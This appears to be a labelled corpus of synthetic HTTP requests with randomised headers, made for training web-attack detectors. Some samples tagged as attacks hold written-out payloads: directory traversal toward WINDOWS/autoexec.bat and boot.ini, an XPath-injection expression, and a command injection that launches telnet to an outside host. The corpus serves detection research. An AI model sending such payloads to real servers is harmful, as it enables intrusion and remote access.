Referer: http://www.oiAeVvjy.gov/ojetm/l8Yl/oBeohehe/ainhp/tsyirTst.pdf
TE: gzip
Trailer: Authorization
User-Agent: Mozilla/9.1 (compatible; MSIE 9.1; Open BSD i586; gt2dy)
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0003x3071
Via: HTTP/7.0 www.meaeosto.jpg, hho/8.4 www.ssse.htm, FTP/9.8 www.p0iz3.png
Transfer-Encoding: ciwyit
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 118 2.156.64.121 "naglietszhgs" 
X-Forwarded-For: 200.2.71.249
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41693
Start - Id: 12402
class: Valid
GET /zD/8peavo/ne_RmuoM_nr1FC9f/ncb0Ab6p9myWx/ertet9aedtsOncthrdo/btpM8hehpasm.dll?kwT.=7522561347&2feets=0776&3ee=t_T0hC_&r7neGeq3aqsa=38842&Vfndtlfinnr93=t5uL0Fn&ua=s8L&ySo1yupyqxc=381691&68xNgJ=54426&symailADhtpassb5Y_@=+1%7E HTTP/1.0
Host: 118.228.205.141:155
Connection: keep-alive
Accept: image/*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tpnLigje-rdoCms, cnco-nn;q=0.8, ztsheRms-cdb, lf-ese;q=0.1
Cache-Control: no-transform
Client-ip: 64.125.54.143
Cookie: ZdUaI=I);raefd=passwdl?;n8syetiereba51=execfhtonao8d;sgtm1ybcraw=9599;niogrealilloc=m7.FVFyQnZ;noEnsmu=zbodyes%
Cookie2: $Version="603"
Date: Wed, 02 Nov 05 10:05:07 UTC
ETag: "IngueJ6JxcRPXvyQH"
Expect: ntndd
From: e4eiiuh@Mdhi8o.com
If-Modified-Since: Sat, 25 Jul 09 10:32:36 CET
If-Unmodified-Since: Sat, 28 Jan 06 09:18:18 GMT
If-Match: "pQcq.Gc0l9VwN3Nv2oom"
If-None-Match: *
If-Range: *
Max-Forwards: 07
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: udtpe glaitms=slres
Authorization: Digest cnonce="eeoentr"
Range: -119886,3059-
Referer: http://rgmb3s.ch/pteb3Eeh/avauoi.asmx
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: joisa/6.1.6.0
UA-CPU: PowerPC
UA-Disp: 8747,794,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 886x769
Via: uito/2.4 www.ntuio.htm, njk/1.4 253.59.50.62
Transfer-Encoding: gzip
Upgrade: hrA/6.7, e6zNoo/8.6, lilor/5.4, esys/7.1
Warning: 289 183.244.61.94 "aiaurzshkw4r" "Wed, 23 Jan 08 17:02:43 CET"
X-Forwarded-For: 197.61.217.27
X-Serial-Number: 41667021783349598958
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12402
Start - Id: 33644
class: Valid
POST /ov7zYf/RTsRsabdr1fuoip0uclh/nCaAbeeuoudets.cfm? HTTP/1.0
Content-Length: 256
Content-Language: lbiE,1i
Content-Encoding: identity
Content-Location: http://www.iGlmaue.cz/uvhbi1iv/oizarld0/enfefebt/eodtuF/xplIpn.exe
Content-MD5: SXRFdEVndHlPeUdmdGFBaA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 03 Nov 09 04:56:32 UTC
Last-Modified: Wed, 30 Mar 05 16:49:42 UTC
Host: 182.211.242.205:547
Connection: e05ix
Accept: */*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.0, compress;q=0.5, gzip, gzip, gzip
Accept-Language: o-n, oitimj-l0nDtl;q=0.0, q-weye, 98c-saq5;q=0.7, mObvooli-ntd;q=0.5
Cache-Control: min-fresh=0449
Client-ip: 143.123.191.1
Cookie: iti8aabIspus=k;ferrhyyu=esetduaebautoexecxp_+he
Cookie2: $Version="136"
Date: Fri, 16 Nov 07 06:16:29 UTC
ETag: "vvLw1PZsucRgJpckrD"
Expect: 100-continue
From: diro@y1e50IxI.com
If-Modified-Since: Fri, 27 Jun 08 15:36:31 GMT
If-Unmodified-Since: Tue, 31 May 05 19:01:12 CET
If-Match: "NW3wwwaqrK_9aLx5z"
If-None-Match: *
If-Range: *
Max-Forwards: 3471
MIME-Version: 8.9
Pragma: a=di
Proxy-Authorization: Basic c242bzp1aHNydHV5
Authorization: NTLM N2U1aW9ndEVjbTczcGVyZ3Nyc0FqOXdmd29kaGR3Ym1zbjB6cm44
Range: 585-81
Referer: /fez4b/tr1d1ghe.asmx
TE: gzip;q=0.0
Trailer: Accept-Language
User-Agent: i6aOsene/1.0.6.9.4
UA-CPU: PowerPC
UA-Disp: 6340,3688,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3257x6651
Via: 4.3 251.171.133.210, FTP/0.8 www.sd5Reid.jpeg:2311, FTP/0.2 216.81.130.83
Transfer-Encoding: compress
Upgrade: eQm/2.2, jtesb/6.3, kh1/5.5
Warning: 498 www.xaotiar.jpg "eukeq6fnna" 
X-Forwarded-For: 246.11.40.158
X-Serial-Number: 310133590231890475
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

eheasioie9w=mq2&ho0uoeoAe2PeSb=d&weHoCl=cFtaioodts f$[|&7Qf=iumail3$&retLsswq2eq=hs7Q7mZ&snnn=Hv@log&QAtreplace6=cxa74rnRceod&t1mrleNAadoe=gd \d&ujHabeo=koo&cSeTbt=2739&om=846&npnts5io3altef=3nolwfe&tbSOtnine=14197&iw65nt0csied=3aOtsbh&eiuOy=92

End - Id: 33644
Start - Id: 45350
class: PathTransversal
GET /xn/dSSyjjN8.cfm?sl=2541531&l5ahRtdsWsDueh=elsiptt&He=df4ta8ushutdowni&nctUirtelnpa=ieinputN&yr_MbAi_0Yn=6995618&9Onehts3hthd5c=09389&oa=89&BShpxBtelnet0OWeJ=e%7EITwhere&FuLgx=nte&rbaqosdauYuTp=elsotmee&Jb=soXFYt0lwv HTTP/1.0
Host: www.edfucknrYN.fr
Connection: detho
Accept: audio/*, image/*;q=0.1
Accept-Charset: *
Accept-Encoding: identity;q=0.6, deflate;q=0.0, gzip
Accept-Language: dsh-iieETsee;q=0.8, 5im-d, mL-r
Cookie: sjeI4fm=3:\winnt\boot.ini
Date: Sun, 21 Jan 07 20:55:03 UTC
Expect: tioojux=3utrTa
If-Unmodified-Since: Fri, 23 Apr 10 12:49:06 GMT
If-Match: *
If-None-Match: *
Referer: /s4tEnc/EiucougT.asmx
TE: trailers,trailers,deflate;q=0.3
User-Agent: Mozilla/1.0 (Windows; U; Win 9x 3.0; eh-0w; rv:4.0.9) Gecko/95203717
Via: 4.0 www.8Eegse.jpeg, 8.9 www.thiss.js
Transfer-Encoding: identity
Warning: 428 www.snt5t2re.htm:1 "ioc0tdAc8lsnofinESol" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45350
Start - Id: 8099
class: Valid
GET /o1-51YSz/D3rmpsH_Mf7scriptT-qk/ostaanehpetr/1eeio/oLm1r7R6a6gbWnQzSnQX/s1aeuh.msf?Sha9_N25mE=rdu0ms5ongt4oawx&ovw3o6ttd1nh=asdwinnthe&y8n=wwBl&oyEnhiltbUp=tSoyhroaza&mB=68933&toe=lca%7Cu&j8ieii=361&maxt9zeoTdTn9h=i%2B&Sutadehho=ee&aE5rEfrn4ts=bd5mmeyhadmin&9E0esr=vlTotohvvn&dwiiss4E=kr9 HTTP/1.0
Host: www.tdhehe.cz
Connection: eqfly
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: hs-o6asaiea;q=0.6, bTog-dhsaelt0, saed-ceh1sdal, cnost-7Tmdi9ly;q=0.0, ha3hgton-aheHid;q=0.9
Cache-Control: only-if-cached
Client-ip: 16.152.221.65
Cookie: ta=av9RdGUy;xs9=tzqOFwX
Cookie2: $Version="9"
Date: Tue, 04 Aug 09 11:39:22 CET
ETag: W/"GEogZHcdzjw_SeFzc7Ha"
Expect: 100-continue
If-Modified-Since: Tue, 07 Nov 06 16:50:22 UTC
If-Unmodified-Since: Tue, 01 Apr 08 15:34:38 UTC
If-Match: "iDFk95UOJVhe6.pU3"
If-None-Match: *
If-Range: Mon, 03 Aug 09 03:07:54 GMT
Max-Forwards: 6790
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic ZWNkSWllOndzam1xZQ==
Authorization: eoHglr troe=nzeoeert
Range: 96926-503180,-72
Referer: /xtiu/aiao/utpk/sodrSl.jsp
TE: trailers
Trailer: User-Agent
User-Agent: meaiteosedutnsd
UA-CPU: 68000
UA-Disp: 4009,1990,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 308x6685
Via: 5.3 www.ye5Sve1u.htm, 9.2 172.45.22.182
Transfer-Encoding: eynU
Upgrade: iSara/8.9, eey/2.3, eswsg/1.6, Eptj/3.0
Warning: 207 www.eaigb.htm "nqposom8cjoD7Vewo1b" 
X-Forwarded-For: 20.60.245.141
X-Serial-Number: 74656
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8099
Start - Id: 19278
class: Valid
GET /a1/ounstMshousstrwle/othbb1rpx/sorNe/sAR-a_yMJs1FZJPwoT/n2adet4ieEeo/elo/eEpwlVcN4-z_6FOq1/onhsNntoLtmeno.png?6tei=17&inheat4Rteilr=1&ibanmnn=4753&oMAckaio=7+ke&te=e0.&eiht=dkAyc&oMtklt=aHW HTTP/1.0
Host: www.Z0rdib.it
Connection: keep-alive
Accept: application/postscript;q=0.4, video/*, video/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 52.24.224.97
Cookie: oymoqyoinnggH3R=fsueno7ed1cemu;uRteTrtvedouuen=llJFl3dT
Cookie2: $Version="0"
Date: Fri, 23 Apr 10 08:31:47 CET
ETag: ".ZlLtGuaV5@fC5qxt72"
Expect: 100-continue
From: Aehridef@o4bErsthw.cz
If-Modified-Since: Sat, 11 Mar 06 03:26:10 GMT
If-Unmodified-Since: Thu, 12 Oct 06 11:10:20 UTC
If-Match: *
If-None-Match: "-CHWlYtXWwatY-@68"
If-Range: "8KQ9GMXz30WY@q9O6KFR"
Max-Forwards: 4
MIME-Version: 6.0
Pragma: yeogtt='dmelnulp'
Proxy-Authorization: Basic OGVlYm9zOnJpYm5z
Authorization: NTLM ZW1lb2FlZXVkbmNiYmFsZXR0aWxvdGRkcG1oY3RkbkFpYWZydA==
Range: 784688-250,21331-
Referer: http://www.elu5esi.fr/lgygi/anEs.sh
TE: deflate,trailers,chunked
Trailer: Expect
User-Agent: Mozilla/1.0 (Windows; U; WinNT 6.9; am-ve; rv:6.5.1) Gecko/47348897
UA-CPU: 68000
UA-Disp: 4381,601,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3128x8633
Via: 5.1 224.5.147.122, 2.9 143.189.83.235
Transfer-Encoding: deflate
Upgrade: e1En/4.6, xtnec/2.1, tlslos/3.4
Warning: 029 www.Bnho.gif "udTe0toroga" 
X-Forwarded-For: 246.243.162.43
X-Serial-Number: 750079016802641903
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19278
Start - Id: 36164
class: PathTransversal
GET /f.Xn9.tiff?meo=L&iOtand=813518&jnga=rqK.e9FnVeI&XPz-jirz40=697705&ne3ccilsrnT=129&hei8Munaesm3i=r4sFcCZ&snlaqtW=m6Flb_ecnCW&s9tz=atwa8nhrtbHcn&0drngrn=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&eodxrgIirsnnoe=9477 HTTP/1.1
Host: 21.7.142.187:0730
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: iso-8859-2, utf-8, euc-jp, isiri-3342;q=0.9
Accept-Encoding: *;q=0.8
Accept-Language: pcal-d5nnjse;q=0.6, iA-fTdChn, odwd-oo2tr
Cache-Control: min-fresh=5
Client-ip: 59.59.119.212
Cookie: wTetd=execs06s
Date: Thu, 04 Dec 08 02:32:14 GMT
ETag: W/"Ur6v1GbQqi5Fpv3B_GUc"
Expect: 100-continue
From: esie@ntoatbni.fr
If-Modified-Since: Tue, 27 Apr 10 22:33:27 UTC
If-Unmodified-Since: Wed, 12 Jul 06 01:36:17 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Jul 04 08:37:32 UTC
Max-Forwards: 7
Pragma: teteoR7b='ieeRBnn'
Proxy-Authorization: Digest nonce
Authorization: Digest nc=b5e6dAC4
Range: 883-12,6163-,33622-
Referer: /llwjf/Tmers/hoLoeqic/3nkeIzm.ace
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: f1irtntno (dp28GQYFm; lg9RW4DlL; oNegjpyW; veuvIUer; ac8c@J)
UA-Disp: 4206,422,32
UA-Color: color32
UA-Pixels: 5546x388
Via: 7.8 27.46.195.168, 8.8 10.97.140.165, 1.0 127.166.226.111
Transfer-Encoding: identity
Upgrade: tIb8/7.2, obg2/2.9, sodta/1.6, qee/7.0, iemac/3.2
Warning: 176 103.233.4.139 "gothscr7a4n" 
X-Forwarded-For: 42.90.242.122
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36164
Start - Id: 21066
class: Valid
GET /smnRNJq/rd0T1@RawhPUdt/ufw/4etcadminAQ_4/1HdOQ4@9lLH7UX/0aOy/oillmeoin/dteEadd.php4?sqssmhpd7cta=pbiframe%26lh%3Fcr&Nt5loE7=1012&eiccene=i5&0aI@Kwmimg=1750516095&between_WRlY1CB81=tbesbg&lbhlleie=%24%24zA%5C HTTP/1.1
Host: www.y4alin.gov
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: compress;q=0.6, gzip, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 226.117.147.113
Cookie: Metdia9fdatz=4;zCaE=irn7l;3a9qthnn=rdNeoor udelete-hzo;sepbm=6895514422;cPh=ir8hza
Cookie2: $Version="56"
Date: Sun, 03 Jun 07 05:38:14 CET
ETag: W/"ipwRsw15MI416@osrnl"
Expect: 100-continue
From: oAtrliet@taveotNi.be
If-Modified-Since: Mon, 31 May 04 21:29:22 UTC
If-Unmodified-Since: Fri, 15 Aug 08 01:44:03 GMT
If-Match: *
If-None-Match: "EUe7Tpm@FnA8Xz.2xeJs"
If-Range: Sun, 23 Mar 08 10:42:26 GMT
Max-Forwards: 3
MIME-Version: 3.2
Pragma: wintort5='8ic'
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic aXNnZHR6c3U6aWR1ZGhzdGY=
Range: 3100-4
Referer: /rlesLt.php
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: Mozilla/1.5 (Machintosh; U; Mac OS X 5.7; sh-1E; rv:2.0.6) Gecko/28501836
UA-CPU: 68000
UA-Disp: 708,2630,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 523x776
Via: aendi/8.8 235.191.40.205
Transfer-Encoding: identity
Upgrade: 7ynff/7.0
Warning: 708 255.125.121.38 "eth4asnh" "Sun, 05 Aug 07 12:56:58 UTC"
X-Forwarded-For: 204.19.242.253
X-Serial-Number: 650978480578430420
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21066
Start - Id: 3559
class: Valid
GET /3SS/jZ@3Av_M0u/t7ATgC4.i6AX/Iposition8_MV2yLinsert8T9/txi19/rRiNRH/c7jzFemT@Q/29g38QjtIuPJgxI/riQMZ-i4.m9@/Os/wvshutdown2/op.XH-oOfYl.gj.tiff?if2diosOn=03&7rmom=034651350&H-1hUOx=eb9drtepecokt+u HTTP/1.0
Host: 200.153.7.247
Connection: tsosbt
Accept: */*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 210.4.231.133
Cookie: 5enapeUo=an6XTKCv
Cookie2: $Version="626"
Date: Mon, 06 Apr 09 20:28:17 GMT
ETag: W/".g.MikOf_33kNSZo"
Expect: sawmtrQV
From: yHte1@lubebreIb.biz
If-Modified-Since: Fri, 04 Feb 05 24:13:33 CET
If-Unmodified-Since: Tue, 31 May 05 12:01:25 UTC
If-Match: "3tu2UPRiJ.j0XxhtmHP"
If-None-Match: "a8wz.xNyuL8gpG2ZChd"
If-Range: Sun, 26 Sep 04 02:46:43 UTC
Max-Forwards: 5
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: gu9n tahhnbsr=mhYueol
Authorization: 2hi0 uiht=d3netle
Range: -6441,532139-93,33703-4
Referer: http://Ss3to.biz/wuaezegi/e3tlamnc/naSha.rar
TE: trailers,chunked
Trailer: Accept-Language
User-Agent: rgIrrqens/3.0.3
UA-CPU: MIPS
UA-Disp: 3085,4582,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 047x6463
Via: 0.2 178.184.181.157
Transfer-Encoding: identity
Upgrade: fDbnri/2.0
Warning: 502 www.deutlFai.htm "sdoAadanidclexcd" "Sun, 24 Jan 10 15:55:45 CET"
X-Forwarded-For: 36.67.190.24
X-Serial-Number: 0103984813938980
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3559
Start - Id: 11996
class: Valid
GET /Tinten19easlirCytwra/sbwe/eFkc.Vj.8fm21rvak.htm?i8d99t=%2BG+nrN00%26ht4 HTTP/1.0
Host: www.nhndpjd.fr
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: identity;q=0.0
Accept-Language: *;q=0.6
Cache-Control: max-age=260
Client-ip: 201.224.46.9
Cookie: rcqaaagchivNM=paRrihs5nme
Cookie2: $Version="042"
Date: Fri, 10 Jul 09 16:40:03 GMT
ETag: "azk_rN20wtoPDiQA8P"
Expect: 100-continue
From: heeltin@ed0ee3i7c.fr
If-Modified-Since: Tue, 27 Nov 07 01:51:52 UTC
If-Unmodified-Since: Thu, 04 Feb 10 03:48:06 CET
If-Match: "R-HPjWm2pgtWQcZW"
If-None-Match: *
If-Range: Sun, 26 Mar 06 07:22:34 CET
Max-Forwards: 2333
MIME-Version: 7.7
Pragma: f=N
Proxy-Authorization: Basic bnRlaTpFcjBiY2k=
Authorization: Digest uri=http://lSed2ms.gov/5edm7s.swf
Range: 9-,78403-
Referer: /uec7dn/fwwh.pl
TE: trailers
Trailer: User-Agent
User-Agent: tAQ8zCip8 http://www.tfde.net
UA-CPU: Sparc
UA-Disp: 833,846,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 630x5808
Via: HTTP/6.8 111.193.179.135
Transfer-Encoding: gzip
Upgrade: r9sP/4.2, ek3c/8.3, hde/4.8, hcnli/4.1, mt9/7.2
Warning: 651 www.2idwSi8.htm "ewtrsoeu59anla8wPh" 
X-Forwarded-For: 239.127.131.42
X-Serial-Number: 670096035438562
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11996
Start - Id: 19125
class: Valid
GET /vnxila4temweSn6fie/lfG44E9Bf.0Z/ohxiMm1YLNrB0/nVmnYaoDx4gi8/yBtzqyW87SOYW/oT8NtesliRfg/iNmXbyj/lurpiet/alecll8etcu/Z.fClYO0Xyv.Q67.jpeg?ads=9wbArtngO7&GeyQraegZiaeds=a2stmenre9au3epnal&xhhnkhpue8ee2s0=tmps0&aimrriitM=ouTtityeanca&t3ioSooEuRi=298&lv=%3Fvary&uCebTofnb=aAvCR2r5&o4DemOos=oP2r&esoNgnemelcy=iOeAl&brot=+hNTeebg&ireqed=iimvmaiqei&sa=7138577222 HTTP/1.1
Host: 77.124.235.230
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=74
Client-ip: 250.159.224.244
Cookie: 4yvSsIntcn3ih=hto
Cookie2: $Version="13"
Date: Wed, 28 Feb 07 03:47:07 UTC
ETag: W/"HKkidc2U2-J99DY_@P"
Expect: dOejntel
From: eono6e9@e4noq.fr
If-Modified-Since: Mon, 09 Jan 06 08:48:32 GMT
If-Unmodified-Since: Fri, 01 Sep 06 19:53:24 UTC
If-Match: "0qU6LOFUDdgfU-4"
If-None-Match: "P3kbnNKeATeeSW2j83pY"
If-Range: "BLQ8wHuMMVDFt7tI1@"
Max-Forwards: 71
MIME-Version: 4.0
Pragma: hmntsa=ii5a
Proxy-Authorization: Digest uri=http://rhDeEzl.com/8Sfrs8nS.tiff
Authorization: NTLM YmxsdHNjYXNzZmR0ZHJpYVRhcml0TnRycm9nYW5lYkVucWV3ZXU=
Range: 83457-7
Referer: http://nvcaonpN.com/tehhe/8ssi3.dll
TE: trailers
Trailer: Warning
User-Agent: fnaers9nL/7.4.4.7
UA-CPU: x86
UA-Disp: 531,060,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 047x447
Via: 3.5 12.39.13.154:1471, HTTP/0.6 97.233.144.162
Transfer-Encoding: gzip
Upgrade: acA9M/5.5, taudh/0.0
Warning: 335 www.ekmeiB.jpg "0lne" "Wed, 30 May 07 03:16:49 UTC"
X-Forwarded-For: 168.136.167.141
X-Serial-Number: 2665334656610459
----: ---------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 19125
Start - Id: 35757
class: XPathInjection
GET /xa7aeAihoshci/oryrnpnq5henuysRh/jo7diiqfltE6Nhhatv/alZDPjdw9RL/dsOh/RKSRhcopyO1z.jpeg?4ttkNgmee=b8nodel&Oalectabpsn=mneiftzhaving&s2eeds=031409&aDeu=7562&uemeems=Oreoa&fsirleg7weuut=82+++++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+++2052%3D&ehtnboaoen7st=ogi.&9eRdpaeyseo=eFRM9m9nm&ss9Oe=snq&include@_z.AM0A=%40tx%3A&vyms2e0le=voetter&euthhnl1regaaa=ioellike HTTP/1.1
Host: 115.69.223.52
Connection: close
Accept: video/*;q=0.1, application/postscript, audio/*;q=0.0
Accept-Charset: iso-8859-1
Accept-Encoding: 
Accept-Language: bWmen-twarA8;q=0.4, lno7-veisN, rtes-ouWAe, yy1mle-ee;q=0.9
Cache-Control: no-cache
Client-ip: 54.55.177.74
Cookie: aFi05MO=32558482;a1rrw=dfv1q;hershke=gafh3dwajss;ig=m-BNp@2vp.wg;.WwOFjT=lFXZ2lamn;a5asesdiwoNos= p
Cookie2: $Version="034"
Date: Wed, 15 Feb 06 16:04:03 UTC
ETag: W/"tx4rnnmX2sb3QcSIRCH"
Expect: ir13aesi=oye3fea;4ez86tn=EcuoTpy
From: nsEeee@gxtagow.be
If-Modified-Since: Fri, 16 May 08 07:34:15 UTC
If-Unmodified-Since: Tue, 20 Jan 09 17:04:50 CET
If-Match: *
If-None-Match: "Ie1-XHSQv.5nL4m"
If-Range: Sun, 31 Jan 10 03:35:40 UTC
Max-Forwards: 7
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: adwi etihc=5lIn4t
Authorization: Digest username="ectz2a"
Range: 912919-0,159182-1735
Referer: http://Tbatdmm.com/eerr0u/ve6lD.jpg
TE: chunked
Trailer: Connection
User-Agent: Mozilla/8.8 (Windows; U; Win 9x 6.6; Hk-hr; rv:7.5.7) Gecko/78206762
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 6100x360
Via: 4.5 248.40.106.232, FTP/6.0 111.241.222.252, 8.4 99.239.16.16
Transfer-Encoding: deflate
Upgrade: Toa/4.1
Warning: 145 165.132.233.207 "niz6ueo" "Sun, 02 Mar 08 13:20:23 UTC"
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 040193563593
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35757
Start - Id: 10291
class: Valid
GET /ngenie3eesisen/omzbx1J_eihnRAbhpX6v/scNf8wjqr.to6uSj/aznFz--GxxP/ythdDfemnJ/ea.g-kI.shtml? HTTP/1.1
Host: www.euitD.de
Connection: hTs8rolG
Accept: */*;q=0.3
Accept-Charset: isiri-3342
Accept-Encoding: deflate, compress, compress;q=0.3
Accept-Language: o9R7xope-iyrrr;q=0.5
Cache-Control: max-stale=1807
Client-ip: 207.49.125.231
Cookie: g3OVzN=esxGi;DqNwiM@imgechoPk=96;evHlef3N=andtcaHhtye;5y36o=h6k;tyfeCr2lstt=ot
Cookie2: $Version="10"
Date: Thu, 21 Aug 08 10:15:57 CET
ETag: W/"4P2Ug0TqDrrOHlC"
Expect: sLia
From: nS3ts1a@t3dEl.it
If-Modified-Since: Wed, 03 Feb 10 15:06:33 CET
If-Unmodified-Since: Sat, 03 Jan 09 17:57:22 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 23 Dec 05 11:39:28 UTC
Max-Forwards: 1902
MIME-Version: 1.9
Pragma: oyco='eagrld'
Proxy-Authorization: gx9nas 4au7d=n9Ge
Authorization: Basic aWw0bjdybjp0MGxlc2k=
Range: 12-5596
Referer: /scg0/hbe8.gz
TE: deflate
Trailer: Via
User-Agent: fdlen3n6qhe
UA-CPU: 68000
UA-Disp: 118,0565,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 032x7737
Via: FTP/5.0 www.jAeR.jpg, 5.3 www.2iou.css
Transfer-Encoding: compress
Upgrade: lxaa/1.4, oOw/0.1, hlr5e/7.5
Warning: 089 77.21.70.73 "oeaacxztie0eaee7elv" "Wed, 05 Oct 05 21:11:47 UTC"
X-Forwarded-For: 141.21.14.128
X-Serial-Number: 24986038742503918311
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 10291
Start - Id: 36693
class: OsCommanding
POST /aitstsuUE/dR/tlersGu/peordnhiel/rMLVj2lH-sywHTR/ezjvG_qH6ik03cg5II./oYYrsg9.fJfOhA/@nhOBusVrtY1q/Yc12Vo/a_2iPxPKwGY4i6/tsu.gif? HTTP/1.1
Content-Length: 174
Content-Language: cHos
Content-Encoding: deflate
Content-Location: /asu5/8ccqa.rar
Content-MD5: YTNwdGVhdHlvc0VMYm50dA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 04 Nov 06 03:20:48 GMT
Last-Modified: Thu, 07 Feb 08 17:55:08 UTC
Host: 43.162.148.12
Connection: keep-alive
Accept: text/plain;q=0.6, application/*;q=0.1, text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eiuomel-ojGue7o, sv-dohEuate, a17-p;q=0.8, cskm8n-OAa;q=0.0, 3gtf39f-tOsa6
Client-ip: 131.23.123.221
Cookie: nFowshssre=ehS6frh3;dckEosrarmi9=zooceddn;anaZaadomite=trpis;93in7rpn=fwtHfI
Cookie2: $Version="30"
Date: Wed, 12 Nov 08 05:46:59 CET
If-Match: "36xnzueWE8q@hfH.yFXT"
If-Range: Fri, 24 Mar 06 04:52:52 UTC
Max-Forwards: 872
Authorization: Basic TXpsbmNhYTp0dGFvNGNn
Range: 6660-
Referer: /lutil/9pdbdn.php3
TE: trailers
User-Agent: RawAs (tewBJXi; 455Nfcm71)
UA-CPU: StrongARM
UA-Color: color32
UA-Pixels: 654x545
Via: rh6e/7.4 153.216.40.232, 8.3 www.orsCit.jpg:9
Transfer-Encoding: identity
----: -------------------------

entegsetg=a2HaA&tourrasbs=\" \;     \/usr\/bin\/telnet   www.enicic.com 045\;&ke1ra= edrttelnet shutdownqdivlhd'l+re%&UvIthrfS3Uz=ae?eNi5;te

End - Id: 36693
Start - Id: 26277
class: Valid
GET /azNnDjaeboe3aIse/WM45vYNhG/rsro6/eSeiherlao.php?eof=edcI%3C2mcl&nHili6ecxrgt=70331345&nutruE8=67001&7M76unionc=hndivi%3Akt+d&a5ngyt8eedio=ssam%7C7 HTTP/1.0
Host: www.ebaoobDnto.de
Connection: keep-alive
Accept: text/*;q=0.4, audio/x-wav;q=0.7, audio/x-wav
Accept-Charset: iso-8859-1;q=0.7, euc-cn;q=0.6, windows-1251;q=0.3, ks_c_5601-1987, euc-jp;q=0.9
Accept-Encoding: deflate;q=0.3, identity;q=0.6, compress;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 70.60.57.86
Cookie: lyoeeg=awNAaoaoinoeec;t3=+;nYnablfh=n8e;Ea34lhe=v_g0EbUj93tD
Cookie2: $Version="448"
Date: Thu, 14 Jan 10 02:31:19 CET
ETag: "wVO5U.11JOdCxcIz4TQp"
Expect: 100-continue
From: taeoEwfn@tnh7dio.org
If-Modified-Since: Mon, 18 Sep 06 09:56:11 CET
If-Unmodified-Since: Fri, 03 Oct 08 02:56:42 UTC
If-Match: *
If-None-Match: *
If-Range: "QNM7.lV.D1eHng1Eqx"
Max-Forwards: 0966
MIME-Version: 8.0
Pragma: P16h7=hmo
Proxy-Authorization: Basic ZTVvZTlrYjprYXR3Mg==
Authorization: NTLM bGZoYWFyc3E1ZW1zZHRuOHVucnJkcmk3aWhuYXNTY3FiZWk=
Range: -844,-3965
Referer: http://www.e59s.net/2zaninu0.rar
TE: chunked;q=0.1
Trailer: Upgrade
User-Agent: Mozilla/8.5 (Machintosh; U; PPC Mac OS X 4.8; dt-h8; rv:1.5.6) Gecko/13940553
UA-CPU: 68000
UA-Disp: 509,4481,16
UA-OS: Win98
UA-Color: color16
